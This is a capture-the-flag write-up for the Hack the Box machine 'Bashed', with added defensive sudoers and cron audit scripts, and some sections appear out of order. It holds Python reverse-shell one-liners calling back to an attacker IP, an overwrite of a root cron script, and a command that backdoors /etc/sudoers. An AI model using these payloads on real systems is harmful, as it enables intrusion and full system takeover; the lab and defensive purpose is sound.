# Disboard #

## BASHED (Hack the Box)

10.10.10.68


Last updated 1 year ago

### Recon

```shell
nmap-auto 10.10.10.68 all
```

```
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
```

The only interesting port is the HTTP service, so that will be the starting point.

### Enumeration

Since the only open port is the HTTP port, enumerating the webpage will probably provide an exploitation avenue. A quick look at the webpage, "Arrexel's Development Site", shows a blog.

The first entry on the blog has the following two links: https://github.com/Arrexel/phpbash and http://10.10.10.68/single.html.

The single.html webpage is really peculiar because it shows an example of an interactive web shell running at "/uploads/phpbash.php". In fact, the creator of the website even goes as far as to say "I actually developed it on this exact server!". Maybe it's still on it. At first glance, it doesn't exist in the "/uploads" folder like the screenshot shows, but maybe it is somewhere else.

```shell
python3 dirsearch.py -e txt,html,php,sh -w /home/z3r0/Resources/wordlists/dir-list.txt -t 10 -u http://10.10.10.68/
```

### Exploitation

Typing the command `sudo -l` lists the commands the invoking user is allowed to run on the current host. The user www-data happens to be able to run all commands as the user scriptmanager with no password. The user www-data can also access the home directories of both users, arrexel and scriptmanager, one of which contains the following user flag:

user.txt: 2c281f318555dbc1b856957c7147bfc1

The web shell isn't persistent, so a reverse shell might be better. I tried a handful of reverse shells (bash, PHP, netcat), but the only one that worked was a Python reverse shell. After setting up a listener with netcat using the command `rlwrap nc -nvlp 9000`, the following Python command can be run in the web shell to catch a shell:

```shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
```

The result is a reverse shell as www-data (use the command `python -c 'import pty;pty.spawn("/bin/bash")'` to get a tty shell).

Since this is a tty shell, it's possible to use the `sudo -l` information noted above to enter a shell as user scriptmanager:

```shell
sudo -u scriptmanager /bin/bash
```

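
The `sudo -l` result above, www-data running anything as scriptmanager without a password, is exactly the kind of rule a defender wants to catch before an attacker does. The Python script below is an added example and not part of the original writeup or the box: it parses a constructed `/etc/sudoers` sample and flags passwordless `ALL` grants, any grant to a non-interactive service account, and unrestricted hops to a third user, whose own privileges then become the real limit. The www-data line in the sample is an assumed rendering of the `sudo -l` output; the page does not show the box's real sudoers file.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample of an /etc/sudoers file. The www-data line is an assumed
# representation of the "sudo -l" result described in the writeup (www-data may run
# any command as scriptmanager without a password); it is not the box's real file.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%admin          ALL=(ALL) ALL
www-data        ALL=(scriptmanager) NOPASSWD: ALL
backup          ALL=(root) NOPASSWD: /usr/bin/rsync
deploy          ALL=(ALL:ALL) NOPASSWD: ALL   # trailing comment
"""

# Accounts that normally never need an interactive sudo grant at all.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "backup", "nobody", "postgres", "mysql"}

# user  host = (runas) TAG: commands   -- the user-specification form of sudoers(5)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


@dataclass
class Finding:
    user: str
    runas: str
    cmds: str
    severity: str
    reasons: List[str] = field(default_factory=list)


def parse_rule(line: str) -> Optional[Tuple[str, str, bool, str]]:
    """Return (user, runas, nopasswd, cmds) for a user-spec line, or None for
    comments, blanks, Defaults and alias definitions."""
    body = line.split("#", 1)[0].strip()
    if not body or body.startswith(("Defaults", "User_Alias", "Cmnd_Alias",
                                    "Host_Alias", "Runas_Alias")):
        return None
    m = RULE_RE.match(body)
    if not m:
        return None
    runas = m["runas"] or "root"           # no (runas) list means root
    nopasswd = "NOPASSWD:" in m["tags"]
    return m["user"], runas, nopasswd, m["cmds"].strip()


def audit_sudoers(text: str) -> List[Finding]:
    """Flag the rule shapes that turned a web shell into root on this box."""
    findings = []
    for line in text.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        user, runas, nopasswd, cmds = parsed
        reasons = []
        if nopasswd and cmds == "ALL":
            reasons.append("passwordless ALL: any command, no authentication")
        if user in SERVICE_ACCOUNTS:
            reasons.append("sudo grant to a non-interactive service account")
        if runas not in ("root", "ALL", "ALL:ALL") and cmds == "ALL":
            reasons.append(f"unrestricted hop to '{runas}': that account's own "
                           f"privileges are now the real limit")
        if reasons:
            severity = "high" if (nopasswd and cmds == "ALL") else "medium"
            findings.append(Finding(user, runas, cmds, severity, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.severity}] {f.user} -> ({f.runas}) {f.cmds}: " + "; ".join(f.reasons))
```

Running it prints one line per finding; the www-data rule trips all three checks, which is the chain the writeup walks (web shell to www-data, to scriptmanager, and from there to root through the cron job).
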
### Privilege Escalation

Looking through the directories starting from root, the unusual folder "/scripts" stood out. Entering it showed two files: (1) test.py and (2) test.txt. Even more interesting, the command `ls -lisa test*` showed that test.txt was created by root, so maybe when scriptmanager writes test.py, root runs the script afterwards.

To test it, create another listener with netcat using the command `rlwrap nc -nvlp 9001`, then edit the test.py file to send a reverse shell to that second port.

test.py (original):

```python
f = open("test.txt", "w")
f.write("testing 123!")
f.close  # sic: the file on the box omits the parentheses, so close() is never called
```

test.py (modified to call back to the second listener):

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.13",9001))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
```

This can be changed using the echo command:

```shell
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > test.py
```

Sure enough, after waiting a short time, the second listener receives a connection from root.

Entering the command `ps aux` in the root shell to show the active processes reveals the process `root 1750 0.0 0.0 4508 796 ? Ss 16:30 0:00 /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done`. It seems that root has a cron job that enters the "/scripts" folder and runs every Python file in it as the root user. So really, any script that gives a backdoor to root would have worked, not just a reverse shell. To try that, maybe the following script, which gives user scriptmanager the ability to call all binaries with root privilege, will work:

```python
import os
os.system('echo "scriptmanager ALL=(ALL:ALL) NOPASSWD: ALL" >> /etc/sudoers')
```

After letting the cron job run, the command `sudo su` worked and gave root access! Cool, that means that there are a variety of scripts that can be run to get root. The last step is to collect the flag in the "/root" directory.

root.txt: cc4f0afe3a1026d402ba10329674a8e2

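The cron job seen in `ps aux` is the actual root cause of the escalation: root executes every `*.py` in "/scripts", and a lower-privileged user can write there. The Python script below is an added example, not the writeup's own code, that audits root crontab entries for paths that are writable by group or other, or not owned by the trusted uid, including every entry of a directory the command loops over. The crontab lines and the directory tree are constructed to mirror the box; because the demo tree is created by an unprivileged user, `run_demo()` passes `trusted_uid=os.getuid()` so that only the permission-bit findings fire, whereas a real audit keeps the default of uid 0.

```python
import os
import re
import stat
import tempfile
from typing import List, Tuple

# Constructed root crontab for the example. The first entry mirrors the command the
# writeup saw in ps aux; the second is an invented benign entry for contrast.
SAMPLE_ROOT_CRONTAB = """\
# m h dom mon dow command
* * * * * cd /scripts; for f in *.py; do python "$f"; done
0 3 * * * /opt/backup/run.sh
"""

CRON_LINE_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<cmd>.+?)\s*$")  # five time fields, then the command
PATH_RE = re.compile(r"(?<![\w-])(/[\w./-]+)")                     # absolute paths inside the command


def extract_paths(command: str) -> List[str]:
    """Absolute paths mentioned in a cron command (e.g. the directory after 'cd')."""
    return sorted(set(PATH_RE.findall(command)))


def writable_by_others(st: os.stat_result) -> bool:
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_path(abs_path: str, root: str, trusted_uid: int) -> List[str]:
    """Problems with one path: wrong owner or a group/other write bit. A directory is
    checked together with every entry in it, since the cron loop runs all of them."""
    real = os.path.join(root, abs_path.lstrip("/"))
    if not os.path.lexists(real):
        return []
    targets = [(abs_path, os.lstat(real))]
    if stat.S_ISDIR(targets[0][1].st_mode):
        for name in sorted(os.listdir(real)):
            targets.append((abs_path.rstrip("/") + "/" + name,
                            os.lstat(os.path.join(real, name))))
    problems = []
    for shown, st in targets:
        if st.st_uid != trusted_uid:
            problems.append(f"{shown}: owned by uid {st.st_uid}, expected {trusted_uid}")
        if writable_by_others(st):
            problems.append(f"{shown}: writable by group/other ({stat.filemode(st.st_mode)})")
    return problems


def audit_crontab(text: str, root: str = "/", trusted_uid: int = 0) -> List[Tuple[str, str]]:
    """(command, problem) pairs for every cron entry that touches a weak path.
    root lets the audit run against a copied or constructed tree."""
    findings = []
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = CRON_LINE_RE.match(line)
        if not m:
            continue
        for path in extract_paths(m["cmd"]):
            for problem in audit_path(path, root, trusted_uid):
                findings.append((m["cmd"], problem))
    return findings


def build_demo_tree(base: str) -> None:
    """Constructed tree: a world-writable /scripts holding a world-writable test.py,
    next to a correctly locked-down /opt/backup."""
    scripts = os.path.join(base, "scripts")
    os.makedirs(scripts)
    with open(os.path.join(scripts, "test.py"), "w") as fh:
        fh.write('f = open("test.txt", "w")\nf.write("testing 123!")\nf.close()\n')
    os.chmod(os.path.join(scripts, "test.py"), 0o666)
    os.chmod(scripts, 0o777)
    backup = os.path.join(base, "opt", "backup")
    os.makedirs(backup)
    with open(os.path.join(backup, "run.sh"), "w") as fh:
        fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(os.path.join(backup, "run.sh"), 0o755)
    os.chmod(backup, 0o755)


def run_demo() -> List[str]:
    """Build the tree in a temp dir and return the problems found. trusted_uid is the
    current uid because the demo tree is not root-owned; a real audit keeps uid 0."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return [problem for _, problem in
                audit_crontab(SAMPLE_ROOT_CRONTAB, root=tmp, trusted_uid=os.getuid())]


if __name__ == "__main__":
    for problem in run_demo():
        print(problem)
```

Only the "/scripts" entry and its test.py are reported; the backup job passes because its script and directory are root-owned and not writable by anyone else, which is the fix for this box as well: `/scripts` should be `0755` root-owned, and a privileged cron job should never glob-execute a directory another user can write to.
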
Fuzzing possible directories can reveal secrets about the webpage. In this case, I will use [dirsearch.py](https://github.com/maurosoria/dirsearch). The following command searches for (1) txt files, (2) html files, (3) php files, and (4) sh files using a wordlist that contains many common directory names.

Sitting in the "/dev" folder is the PHP web shell made by the website creator. There are actually two that could be used: (1) http://10.10.10.68/dev/phpbash.php, and (2) http://10.10.10.68/dev/phpbash.min.php. Navigating to the first gives a PHP web shell owned by www-data. The following is a screenshot of the web shell with some of the first commands I usually type in a shell:
